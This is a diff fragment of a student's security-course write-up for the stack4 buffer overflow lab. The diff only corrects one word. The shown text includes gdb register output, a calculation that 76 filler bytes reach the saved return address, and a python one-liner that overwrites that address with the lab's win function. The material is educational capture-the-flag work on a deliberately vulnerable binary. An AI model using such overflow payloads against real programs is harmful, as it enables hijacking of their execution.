HiIAmTzeKean/CS3312-Cyber-Security-Systems/assignment1/stack4.md

 >>>ebp            0xbffffc68       0xbffffc68
 ```

-From here we will reverse work the location of the stack to be `0xbffffc20` and we will have to fill till `0xbffffc68 + 4` that gives us a total of 76char before injecting our `win` location
+From here we will reverse engineer the location of the stack to be `0xbffffc20` and we will have to fill till `0xbffffc68 + 4` that gives us a total of 76char before injecting our `win` location

 ```shell
 python -c 'print "1"*76 + "\xf4\x83\x04\x08"' | ./stack4